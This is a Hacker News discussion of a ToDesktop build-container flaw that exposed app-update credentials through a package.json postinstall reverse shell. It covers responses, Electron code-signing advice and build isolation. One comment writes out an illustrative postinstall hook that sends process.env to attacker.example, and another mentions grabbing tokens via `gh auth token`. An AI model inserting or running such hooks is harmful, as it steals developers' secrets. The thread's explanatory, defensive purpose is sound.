davej 5 hours ago

Dave here, founder of ToDesktop. I've shared a write-up: https://www.todesktop.com/blog/posts/security-incident-at-to...

This vulnerability was genuinely embarrassing, and I'm sorry we let it happen. After thorough internal and third-party audits, we've fundamentally restructured our security practices to ensure this scenario can't recur. Full details are covered in the linked write-up. Special thanks to Eva for responsibly reporting this.

  • spudlyo 5 hours ago

    > cannot happen again.

    Hubris. Does not inspire confidence.

    > We resolved the vulnerability within 26 hours of its initial report, and additional security audits were completed by February 2025.

    After reading the vulnerability report, I am impressed at how quickly you guys jumped on the fix, so kudos. Did the security audit lead to any significant remediation work? If you weren't following PoLP, I wonder what else may have been overlooked?

    • davej 5 hours ago

      Fair point. Perhaps better phrased as "to ensure this scenario can't recur." I'll edit my post.

      Yes, we re-architected our build container as part of remediation efforts; it was quite significant.

    • abhiaagarwal 4 hours ago

      Based on the claims on the blog, it feels reasonable to say that this "cannot" occur again.

    • TZubiri 30 minutes ago

      The only acceptable response is to resign with shame.

      I'm not gonna champion for this because it's not for me, it's for them, but they don't realize how much of a danger this is. How much of a fuck up. This isn't a slap on the wrist.

      If you have any pride, and you want a chance at doing quality software, the moment you get pwned like this, you resign, let the company die, and let someone else give it a shot.

      • braiamp 27 minutes ago

        This is the wrong response, because it means the learning would be lost. The security community didn't want that to happen when one of the CAs had a vulnerability, and we do not want it to happen to other companies either. We want companies to succeed and get better; shaming doesn't help with that. Learning the right lessons does, and resigning means you are learning the wrong ones.

        • TZubiri 18 minutes ago

          I don't think the lesson is lost. The opposite.

          If you get a slap on the wrist, do you learn? No, you play it down.

          However, if a dev who gets caught doing something bad is forced to resign, then all the other devs doing the same thing will shape up.

          • otterley 10 minutes ago

            Under what theory of psychology are you operating? This is along the same lines as claiming that punishment is an effective deterrent of crime, which we know from experience isn't true.

  • hakaneskici 4 hours ago

    How can, let's say, Cursor users be sure they were not compromised?

    > No malicious usage was detected

    Curious to hear about the methods used, if OK to share. Something like STRIDE maybe?

    • Centigonal 2 hours ago

      from todesktop's report:

      > Completed a review of the logs. Confirming all identified activity was from the researcher (verified by IP Address and user agent).

      • hakaneskici 2 hours ago

        With privileged access, attackers can tamper with the evidence (repudiation), so although I'd say "nothing in the logs" is acceptable, not everyone may agree. These two attack vectors are part of the STRIDE threat modeling approach.

        • morgante an hour ago

          They don't elaborate on the logging details, but certainly most good systems don't allow log tampering, even for admins.

  • doctorpangloss an hour ago

    I don't know. On the one hand the Internet goes and lashes out at tiny companies run by ordinary people for things that kind of don't matter. The drama is always a bigger story than the consequences, or whatever.

    On the other hand, let's say this is really as big of a deal as the dramas make it out to be. Do we want a world where ordinary people can raise money? I do. The commenters who are sincere about these security dramas want VCs to only give money to two groups of people and never a small amount to ordinary people. Those groups are: the sons and daughters of important celebrities and business people, and the 12 kids who do Math 55 every year.

    Be careful what you wish for, Joe "Hacker" News.

  • edm0nd 5 hours ago

    how much of a bounty was paid to Eva for this finding?

    • richardboegli 4 hours ago

      > they were nice enough to compensate me for my efforts and were very nice in general.

      They were compensated, but the author doesn't elaborate on the amount.

      • jsheard 3 hours ago

        Sounds like it was handled better than the author's last article, where the Arc browser company initially didn't offer any bounty for a similar RCE, then awarded a paltry $2k after getting roasted, and finally bumped it up to $20k after getting roasted even more.

  • TZubiri an hour ago

    Don't worry man, it's way more embarrassing for the people that downloaded your dep or any upstream tool.

    If they didn't pay you a cent, you have no liability here.

    • remram 28 minutes ago

      This is not how the law works anywhere, thankfully.

      • TZubiri 16 minutes ago

        Well, for one, it was a gift, so there is no valid contract, right? There are no direct damages because nothing was paid and there is nothing to refund. Wrt indirect damages, there's bound to be a disclaimer or two, at least at the app layer.

        IANAL, not legal advice

felixrieseberg 3 hours ago

As an Electron maintainer, I'll reiterate a warning I've given many people before: Your auto-updater and the underlying code-signing and notarization mechanisms are sacred. The recovery mechanisms for the entire system are extremely painful and often require embarrassing emails to customers. A compromised code-signing certificate is close to the top of my personal nightmares.

Dave and toDesktop have built a product that serves many people really well, but I'd encourage everyone building desktop software (no matter how, with or without toDesktop!) to really understand everything involved in compiling, signing, and releasing your builds. In my projects, I often make an argument against too much abstraction and long dependency chains in those processes.

If you're an Electron developer (like the apps mentioned), I recommend:

* Build with Electron Forge, which is maintained by Electron and uses @electron/windows-sign and @electron/osx-sign directly. No magic.

* For Windows signing, use Azure Trusted Signing, which signs just-in-time. That's relatively new and offers some additional recovery mechanisms in the worst case.

* You probably want to rotate your certificates if you ever gave anyone else access.

* Lastly, you should probably be the only one with the keys to your update server.

  • TZubiri 28 minutes ago

    Question.

    I've noticed a lot of websites import scripts from other sites instead of hosting them locally.

    <script src="scriptscdn.com/libv1.3">

    I almost never see a hash in there. Is this as dangerous as it looks? Why don't people just use a hash?

    • bastawhiz 3 minutes ago

      1. Yes

      2. Because that requires you to know how to find the hash and add it.

      Truthfully, the burden should be on the third party that's serving the script (where did you copy that HTML from in the first place?), but they aren't incentivized to have other sites use a hash.
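
      For anyone wanting to add one, here's a minimal sketch of computing the integrity value yourself with Node (the CDN URL is a placeholder; the browser hashes the fetched file and refuses to run it if the value doesn't match):

        // sketch: compute a Subresource Integrity value for a third-party script
        // usage: node sri.js https://scriptscdn.example.com/libv1.3.js
        const crypto = require('node:crypto');

        async function sri(url) {
          const res = await fetch(url);                  // global fetch, Node 18+
          const body = Buffer.from(await res.arrayBuffer());
          return 'sha384-' + crypto.createHash('sha384').update(body).digest('base64');
        }

        sri(process.argv[2]).then((integrity) => {
          // paste the output into the tag:
          // <script src="..." integrity="sha384-..." crossorigin="anonymous"></script>
          console.log(integrity);
        });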

  • paradite 2 hours ago

    Hi. I'm an electron app developer. I use electron builder paired with AWS S3 for auto update.

    I have always put Windows signing on hold due to the cost of a commercial certificate.

    Is the Azure Trusted Signing significantly cheaper than obtaining a commercial certificate? Can I run it on my CI as part of my build pipeline?

    • felixrieseberg 2 hours ago

      Azure Trusted Signing is one of the best things Microsoft did for app developers last year; I'm really happy with it. It's $9.99/month and open to both companies and individuals who can verify their identity (it used to be companies only). You really just call signtool.exe with a custom dll.

      I wrote @electron/windows-sign specifically to cover it: https://github.com/electron/windows-sign

      Reference implementation: https://github.com/felixrieseberg/windows95/blob/master/forg...
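
      If it helps to picture "signtool.exe with a custom dll": my understanding is the raw call looks roughly like the sketch below. The endpoint region, account name, profile name, and file name are placeholders (assumptions on my part), so check the Trusted Signing docs for your own setup.

        :: metadata.json (placeholder values) tells the dlib which Trusted Signing account/profile to use:
        ::   { "Endpoint": "https://eus.codesigning.azure.net",
        ::     "CodeSigningAccountName": "my-account",
        ::     "CertificateProfileName": "my-profile" }
        signtool sign /v /fd SHA256 ^
          /tr "http://timestamp.acs.microsoft.com" /td SHA256 ^
          /dlib "Azure.CodeSigning.Dlib.dll" ^
          /dmdf "metadata.json" ^
          "MyApp Setup.exe"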

      • itsFolf 2 hours ago

        The big limitation with Azure Trusted Signing is that your organization needs to be at least 3 years old. It seems to be a weird case where developers who could benefit most from this solution are pushed towards doing something else, with no big reason to switch back later.

      • paradite 2 hours ago

        Hi. This is very helpful. Thanks for sharing!

  • gamedever 2 hours ago

    And yet, tons of developers install github apps that ask for full permissions to control all repos and can therefore do the same things to every dev using those services.

    github should be ashamed this possibility even exists, and doubly ashamed that their permission system and UX are so poorly conceived that they lead apps to ask for all the permissions.

    IMO, github should spend significant effort so that the default is to present the user with a list of repos they want some github integration to have permissions for, and then, for each repo, the specific permissions needed. It should be designed so that minimal permissions are encouraged.

    As it is, the path of least resistance for app devs is "give me root" and for users to say "ok, sure"

    • xmprt an hour ago

      I personally haven't worked with many of the github apps that you seem to refer to, but the few that I've used are limited to the specific repositories that I grant access to, and within those repositories their access control is scoped as well. I figured this is all stuff that can be controlled on Github's side. Am I mistaken?

    • madeofpalk 2 hours ago

      Why spend that effort when any code you run on your machine (such as dependency post-install scripts, or the dependencies themselves!) can just run `gh auth token` and grab a token for all the code you push up?

      By design, the gh cli wants write access to everything on github you can access.

    • charrondev an hour ago

      I will note that, at least for our GitHub Enterprise setup, permissions are all granular, and tokens are managed by the org and require an approval process.

      I’m not sure how much of this is “standard” for an org though.

sky2224 2 hours ago

This is the second big vulnerability found by this individual in what... 6 months? The previous exploit (which was in the Arc browser) also leveraged a poorly configured firebase db: https://kibty.town/blog/arc/

So this is to say: at what point should we start pointing the finger at Google for allowing developers to shoot themselves in the foot so easily? Granted, I don't have much experience with firebase, but to me this just screams that something about the configuration process is being improperly communicated, or is just too convoluted as a whole.

  • 999900000999 2 hours ago

    Firebase lets anyone get started in 30 seconds.

    Details like proper usage, security, etc. are often overlooked. Google isn't to blame if you ship a paid product without running a security audit.

    I use firebase essentially for hobbyist projects for me and my friends.

    If I had to guess, these issues come about because developers are rushing to market. Not Google's fault ... What works for a prototype isn't production ready.

  • nightpool 2 hours ago

    I don't think Firebase is really at fault here—the major issue they highlighted is that the deployment pipeline uploaded the compiled artifact to a shared bucket from a container that the user controlled. This doesn't have anything to do with firebase—it would have been just as impactful if the container building the code uploaded it to S3 from the buildbot.

mcoliver 3 hours ago

"i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload"

Just want to make sure I understand this. They made a hello world app and submitted it to todesktop with a post install script that opened a reverse shell on the todesktop build machine? Maybe I missed it, but that shouldn't be possible. The build machine shouldn't have open outbound internet access, right? I didn't see that explained clearly, but maybe I'm missing something or misunderstanding.

  • TheDong 3 hours ago

    In what world do you have a machine which downloads source code to build it, but doesn't have outbound internet access so it can't download source code or build dependencies?

    Like, effectively the "build machine" here is a locked down docker container that runs "git clone && npm build", right? How do you do either of those activities without outbound network access?

    And outbound network access is enough on its own to create a reverse shell, even without any open inbound ports.

    The miss here isn't that the build container had network access; it's that the build container both ran untrusted code and had access to secrets.
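
    To make that concrete (an illustrative sketch, not the researcher's actual payload): any package.json the build container installs gets to run arbitrary code at install time, so with secrets sitting in the environment, something this small is already game over:

      {
        "name": "hello-world-app",
        "version": "1.0.0",
        "scripts": {
          "postinstall": "node -e \"fetch('https://attacker.example/x', { method: 'POST', body: JSON.stringify(process.env) })\""
        }
      }

    Same idea as the reverse shell in the write-up: the fix isn't blocking the network, it's not letting that process see anything worth stealing.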

    • arccy 3 hours ago

      It's common, but that doesn't mean it's secure. A lot of Linux distros separate download (outbound access allowed to fetch dependencies) from build (no outside access) in their packaging.

      Unfortunately, in some ecosystems, even downloading packages using the native package managers is unsafe because of postinstall scripts or equivalent.

    • gtirloni 43 minutes ago

      In a world with an internal proxy/mirror for dependencies and no internet access allowed by build systems.

    • ndriscoll 2 hours ago

      Even if your builders are downloading dependencies on the fly, you can and should force that through an artifact repository (e.g. artifactory) you control. They shouldn't need arbitrary outbound Internet access. The builder needs a token injected with read-only pull permissions for a write-through cache and push permissions to the path it is currently building for. The only thing it needs to talk to is the artifactory instance.
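
      As a sketch of what that looks like on the npm side (hostname and repo path are made up; the same idea works with Nexus, Verdaccio, etc.), the builder's .npmrc points every install at the internal cache and nothing else:

        ; .npmrc on the builder: all packages come through the internal write-through cache
        registry=https://artifactory.internal.example/artifactory/api/npm/npm-virtual/
        ; read-only token injected at build time, scoped to pulling from the cache
        //artifactory.internal.example/artifactory/api/npm/npm-virtual/:_authToken=${NPM_READONLY_TOKEN}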

    • fc417fc802 2 hours ago

      If you don't network isolate your build tooling then how do you have any confidence that your inputs are what you believe them to be? I run my build tools in a network namespace with no connection to the outside world. The dependencies are whatever I explicitly checked into the repo or otherwise placed within the directory tree.
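
      For the curious, the minimal Linux version of that setup (util-linux unshare; the build command is whatever your project uses):

        # -r maps the current user to root inside a new user namespace (no sudo needed)
        # -n creates a fresh network namespace with only a down loopback interface
        unshare -r -n -- npm run build
        # anything in the build that tries to phone home simply fails: no route out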

      • TheDong 37 minutes ago

        You don't have any confidence beyond what lockfiles give you (which is to say the npm postinstall scripts could be very impure, non-hermetic, and output random strings). But if you require users to vendor all their dependencies, fully isolate all network traffic during build, be perfectly pure and reproducible and hermetic, presumably use nix/bazel/etc... well, you won't have any users.

        If you want a perfectly secure system with 0 users, it's pretty easy to build that.

    • mcoliver an hour ago

      There are plenty of worlds that take security more seriously and practice defense in depth. Your response could use a little less hubris and a more genuinely inquisitive tone. Looks like others have already chimed in here, but to respond to your questions (which read as sarcasm):

      - You can have a submission process that accepts a package or downloads dependencies, and then passes it to another machine on an isolated network for code execution / build, which then returns the built package and logs to the network-facing machine for consumption.

      Now sure, if your build machine still exposes everything on it to the user-supplied code (instead of sandboxing the actual npm build/make/etc. command), you could insert malicious code that zips up the whole filesystem, env vars, etc. and exfiltrates them through your built app, in this case snagging the secrets.

      I don't disagree that the secrets on the build machine were the big miss, but I also think designing the build system differently could have helped.

      • TheDong 41 minutes ago

        You have to meet your users where they are. Your users are not using nix and bazel; they're using npm and typescript.

        If your users are using bazel, it's easy to separate "download" from "build", but if you're meeting your users over here where cows aren't spherical, you can't take security that seriously.

        Security doesn't help if all your users leave.

    • katbyte 3 hours ago

      you use a language where you have all your deps local to the repo? ie go vendor?

    • areyourllySorry 3 hours ago

      you can always limit said network access to npm.

      • TheDong 35 minutes ago

        You can't, since a large number of npm post-install scripts also make arbitrary network calls.

        This includes things like downloading pre-compiled binaries for the native architecture from random servers, or compiling native code on the fly.

        npm is really cool.

  • trallnag 3 hours ago

    Isn't it really common for build machines to have outbound internet access? Millions of developers use GitHub Actions for building artifacts and the public runners definitely have outbound internet access

    • tomjakubowski 2 hours ago

      Indeed, you can punch out from an actions runner. Such a thing is probably against GitHub's ToS, but I've heard from my third cousin twice removed that his friend once ssh'ed out from an action to a bastion host, then used port forwarding to get herself a shell on the runner in order to debug a failing build.

      • gtirloni 37 minutes ago

        So this friend escaped from the ephemeral container VM into the build host which happened to have a private SSH on it that allowed it to connect to a bastion host to... go back to the build host and debug a failed build that should be self-contained inside the container VM which they already had access in the first place by the means of, you know, running a build on it? Interesting.

    • arccy 3 hours ago

      A few decades ago, it was also really common to smoke. Common != good. github actions isn't a true build tool; it's an arbitrary code runtime platform with a few triggers tied to your github.

    • selfhoster 2 hours ago

      It is, and regardless of a few other commenters saying or hinting that it isn't... it is. An air-gapped build machine wouldn't work for most software built today.

      • fc417fc802 an hour ago

        Strange. How do things like Nix work then? The nix builders are network isolated. Most (all?) Gentoo packages can also be built without network access. That seems like it should cover a decent proportion of modern software.

        Instances where an air-gapped build machine doesn't work are examples of developer laziness: not bothering to properly document dependencies.

      • ok_dad an hour ago

        Sounds like a problem with modern software build practices to me.

asciii 4 hours ago

> i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload

From ToDesktop incident report,

> This leak occurred because the build container had broader permissions than necessary, allowing a postinstall script in an application's package.json to retrieve Firebase credentials. We have since changed our architecture so that this can not happen again, see the "Infrastructure and tooling" and "Access control and authentication" sections above for more information about our fixes.

I'm curious to know what the trial and error here was to get their machine to spit out the build, or if it was done in one shot.

GuestFAUniverse 4 hours ago

" please do not harass these companies or make it seem like it's their fault, it's not. it's todesktop's fault if anything) "

I don't get it. Why would it be "todesktop's fault", when all the mentioned companies allowed it to push updates?

I had these kinds of discussions with naive developers giving _full access_ to GitHub orgs to various 3rd party apps -- that's never right!

  • stefan_ 3 hours ago

    Yeah, it is their fault. I don't download "todesktop" (to-exploit), I download Cursor. Don't give 3rd parties push access to all your clients; that's crazy. How can this crappy startup's build server sign a build for you? That's insane.

    • floydnoel 31 minutes ago

      it blows me away that this is even a product. it's like a half day of dev time, and they don’t appear to have over-engineered it or even done basic things given the exploit here.

luxurytent 2 hours ago

Love the blog aesthetic, and the same goes for all your friends (linked at the bottom).

  • throitallaway an hour ago

    The lack of capitalization made it difficult for me to quickly read sentences. I had to be much more deliberate when scanning the text.

giantg2 4 hours ago

With the number of dependencies and dependency trees going multiple levels deep? Third-party risk is the largely unaddressed elephant in the room that companies don't care about.

  • TZubiri 23 minutes ago

    I started to use

    - a paid operating system (RHEL), with a team of paid developers and maintainers verifying builds and dependencies.

    - empty dependencies. Only what the core language provides.

    It's not that great of a sacrifice: like $20/mo for the OS, and like 2 days of dev work, which pays for itself in the long run by avoiding a mass of code you don't understand.

vekatimest 3 hours ago

The cat is cute but I'd rather not have it running in front of the text while I'm trying to read and use my cursor.

  • gblargg 43 minutes ago

    I had to go back and enable JavaScript. Wow, is the goal to direct my attention away from reading the text?

    • carcabob 27 minutes ago

      Ironically, it actually helped me stay focused on the article. Kind of like a fidget toy. When part of my brain would get bored, I could just move the cat and satisfy that part of my brain while I keep reading.

      I know that sounds kind of sad that my brain can't focus that well (and it is), but I appreciated the cat.

  • internetter an hour ago

    Then just… put the cursor in the corner? The blog isn’t interactive or anything. I think the cat is cute.

  • ok_dad an hour ago

    Cats tend to do that.

aorloff 2 hours ago

I guess what I'm surprised at here is that a popular(?) IDE would be delivered over a delivery platform like this (immature or not).

I would've expected IDE developers to "roll their own"

rvz 5 hours ago

My goodness. So much third-party risk upon risk and lots of external services opening up this massive attack surface and introducing this RCE vulnerability.

From an Electron bundler service, to sourcemap extraction and now an exposed package.json with the container keys to deploy any app update to anyone's machine.

This isn't the only one; the other day Claude CLI got a full source code leak via the same method, its sourcemaps being exposed.

But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.

  • gamedever 2 hours ago

    Blaming Js/Ts is ridiculous. All those same problems exist in all environments. Js/Ts is the biggest, so it gets the most attention, but if you think it's different in any other environment you're fooling yourself.

    • TZubiri 21 minutes ago

      Ecosystem, not the lang itself.

      It truly is a community issue; it's not a matter of the lang.

      You will never live down fucking left-pad

  • XorNot 4 hours ago

    > But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.

    You've always been able to do the first thing though: the only thing you can do is obfuscate the source map, but it's not like that's a substantial slowdown when you're hunting for authentication points (identify API URLs, work backwards).

    And things like credentials in package.json are just a sickness which is global to computing right now: we have so many ways you can deploy credentials, basically 0 common APIs which aren't globals (files or API keys), and even fewer security tools which acknowledge the real danger (protecting me from my computer's system files is far less valuable than protecting me from code pretending to be me as my own user - where all the really valuable data already is).

    Basically I'm not convinced our security model has ever truly evolved beyond the 1970s, where the danger was "you damage the expensive computer" rather than "the data on the computer is worth orders of magnitude more than the computer".

oguz-ismail 5 hours ago

[flagged]

  • spudlyo 5 hours ago

    Why does it use Neko, the cursor-chasing cat? Why the goth color scheme? These are stylistic choices; there is no explaining them.

    • nkrisc 5 hours ago

      Thankfully there is reader mode. That dumb cat is so obnoxious on mobile.

    • nickthegreek 5 hours ago

      woah, the cat chases your taps on mobile!

  • nickthegreek 5 hours ago

    it’s a blog. people regularly use their personal sites to write in a tone and format that they are fond of. i only normally feel like i see this style from people who were on the internet in the 90s. i’d imagine we would see it even more if phones and auto correct didn’t enforce a specific style. imagine being a slave to the shift key. it can’t even fight back! i’m more upset the urls aren’t actually clickable links.

  • QuadmasterXLII 4 hours ago

    Finding an RCE for every computer running cursor is cool, and typing in all lowercase isn't that cool. Finding an RCE on millions of computers has much, much higher thermal mass than typing quirks, so the blog post makes typing in all lowercase cool.

  • AndrewStephens 5 hours ago

    why do the stars shine? why does rain fall from the sky? using upper case is just a social convention - throw off your chains.

  • ge96 4 hours ago

    the cat chase cursor thing is great

  • edm0nd 5 hours ago

    its cool. not everything has to be typed in a "normal" way.

  • jpbastyr 5 hours ago

    just the style of their blog

orliesaurus 3 hours ago

ToDesktop vulnerability: not surprised. Trust broken.

noisy_boy 2 hours ago

Question/idea: can't GitHub use LLMs to periodically scan the code for vulnerabilities like this and inform the repo owner?

They can even charge for it ;)

  • TZubiri 20 minutes ago

    Problem: a tool built with LLMs for building LLMs with LLMs has a vuln

    Solution: more LLMs

    Snap out of it

TZubiri 34 minutes ago

I can't post things like "what a bunch of clowns" due to the Hacker News guidelines, so let me go by another, more productive route.

These people, the ones who install dependencies (that install dependencies)+, these people who write apps with AI, who in the previous season looped between executing their code and searching for the error on stackoverflow.

Whether they work for a company or have their own startup, the moment that they start charging money, they need to be held liable when shit happens.

When they make it their business model or employability advantage to take free code on the internet, add pumpkin spice, and charge cash for it, they cross the line from pissing off passionate hackers by defiling our craft, to dumping in the pool and ruining it for users and us.

It is not sufficient to write somewhere in a contract that something is "as is" and we hold harmless and this and that. Buddy, if you download an AI tool to write an AI tool to write an AI tool and you decided to slap a password in there, you are playing with big guns; if it gets leaked, you are putting other services at risk, but let's call that a misdemeanor. Because we need to reserve something stronger for when your program fails silently, and someone paid you for it, and they relied on your program, and acted on it.

That's worse than a vulnerability: there is no shared responsibility. At least with a vuln, you can argue that it wasn't all your fault, that someone else actively caused harm. Now are we to believe the greater risk of installing 19k dependencies and programming AI with AI is vulns? No! We have a certainty, not a risk, that they will fuck it up.

Eventually we should license the field, but for now, we gotta hold devs liable.

Give those of us who do 10 times less, but do it right, some kind of marketing advantage; it shouldn't be legal that they are competing with us. A vscode fork got how much in VC funding?

My brothers, let's take up arms and defend. And defend quality software, I say. Fear not writing code, fear not writing raw HTML, fear not, for they don't feel fear, so why should you?